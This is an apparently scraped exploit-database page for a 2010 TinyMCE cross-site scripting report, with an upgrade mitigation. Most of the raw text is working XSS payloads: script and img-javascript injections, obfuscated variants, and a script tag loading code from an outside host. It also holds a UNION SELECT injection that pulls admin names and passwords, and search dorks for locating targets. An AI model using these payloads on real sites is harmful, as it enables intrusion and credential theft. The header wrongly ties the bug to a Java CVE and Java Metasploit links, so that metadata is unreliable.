header-logo
Suggest Exploit
vendor:
TinyMCE
by:
mc2_s3lector
7,5
CVSS
HIGH
Cross-site Scripting (XSS)
79
CWE
Product Name: TinyMCE
Affected Version From: Prior to 3.4.9.1
Affected Version To: 3.4.9.1
Patch Exists: YES
Related CWE: CVE-2010-0840
CPE: a:moxiecode_systems_ab:tinymce
Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-java-cve-2010-0840/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0471/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-0840/https://www.rapid7.com/db/vulnerabilities/vmsa-2011-0003-cve-2010-0840/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0337/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0338/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0574/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0586/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2010-0840/https://www.rapid7.com/db/vulnerabilities/jre-unspecified-cve-2010-0840/https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-0840/https://www.rapid7.com/db/vulnerabilities/hpsim-cve-2010-0840/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0339/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0383/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0489/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02
2010

Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility xss–>popup

A Cross-site Scripting (XSS) vulnerability exists in TinyMCE, a JavaScript-based WYSIWYG editor, due to improper validation of user-supplied input. An attacker can leverage this vulnerability to execute arbitrary HTML and script code in a user's browser session in the context of the affected site. This vulnerability affects TinyMCE versions prior to 3.4.9.1, and is addressed in version 3.4.9.1.

Mitigation:

Upgrade to TinyMCE version 3.4.9.1 or later.
Source

Exploit-DB raw data:

[+] Vurnerebility:	*Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility xss-->popup 
			*& SQl implemented
[+] Language	 :	Java--,Xml
[+] lisences	 :	LGPL
[+] Vendor	 : 	Moxiecode Systems AB
[+] support	 :      IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02;
[+] Category	 :	bug report
[+] vendor	 :	http://tinymce.moxiecode.com/
[+] implemented  :	joomla componen,drupal..
[+] Author 	 :	mc2_s3lector //yogyacarderlink.web.id
[+] dork   	 :	powered:powered by CMS
	   	 :	inurl"file_manager.php?type=img"
[+] Contact	 : 	(00x0---www.yogyacarderlink.web.id
[+]date		 :	4-2-10
[+] biGthank to	 :	Allah,jasakom,KeDai Computerworks,all indonesian like a coding,
------------------------------------------------------------------------------------
--[Vulnerability sampling]--
-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------
#	alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode(X1,X2,X3,x4))//\";
	alert(String.fromCharCode(X1,X2,X3,x4))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(X1,X2,X3,x4))</SCRIPT>
#	
-------------------------------------------------------------------------------------------------------------------------
#	'';!--"<XSS>=&{()}'
------------------------------------------------------------------------------------
	<script SRC=http//:server.com/xss.js></put_SCRIPT>
	<a hreef="http://www.server://www.server.com/server.com/">put_code</a>
	<a href="http://www.server.com./">put_code</a>
	<marquee>http://server.net">put_code</marquee>
	<a href="//srver.net">put_code</A>
	<a href="http://0x1x.01x0061.0x6/">put_code</a>
------------------------------------------------------------------------------------
	[Thread img src]

	"<img src=javascript:alert(&quot;XSS&quot;)>"
	"<img src="javascript:alert('Put_script');"> [or] <IMG SRC=javascript:alert('put_Script')>"
	"<IMG SRC=javascript:alert(String.fromCharCode(X1,X2,X3,X4))>"
	"<img src=`javascript:alert("put_xss")`>"
	"<IMG SRC="jav	ascript:alert('XSS');">"

	<IMG
	SRC
	=
	"
	write javascript vertikal position exmpl:	
	j
	s
	:
	a
	l
	e
	r
	t
	(
	'
	put code vertical position
	'
	)
	)
	;
	>

	"<IMG SRC=&#1;&#2;&#3;&#4;&#5;&#6;&#7;>"

try conversion---->use RainbowText from <IMG SRC=&#1;&#2;&#3;&#3>
make compilign:
<font color="#ff0000">&lt;</font><font color="#ff4200">I</font><font color="#ff8500">M</font><font color="#ffc700">G</font> <font color="#f3ff00">S</font><font color="#b1ff00">R</font><font color="#6eff00">C</font><font color="#2cff00">=</font><font color="#00ff16">&amp;</font><font color="#00ff58">#</font><font color="#00ff9b">1</font><font color="#00ffdd">;</font><font color="#00ddff">&amp;</font><font color="#009bff">#</font><font color="#0058ff">2</font><font color="#0016ff">;</font><font color="#2c00ff">&amp;</font><font color="#6e00ff">#</font><font color="#b100ff">3</font><font color="#f300ff">;</font><font color="#ff00c7">&amp;</font><font color="#ff0085">#</font><font color="#ff0042">3</font><font color="#ff0000">&gt;</font>
-------------------------------------------------------------------------------------------------------------------------------------------------------------

SQL implemented:Injection vulnerability---->installed on c-panel(joomla---sampling write tabel view/editor)

Exploit :server/patch/index.php?menuID=-value union select//**//users/2,3,4,5/password//**//from/2,3,4,5//,Group_CONCAT(name,CHAR(3,4,5),wachtwoord),2,3 from admin--




#########################################################################################################

# www.yogyacarderlink.web.id

Navigation

Suggest Exploit

Services By CQR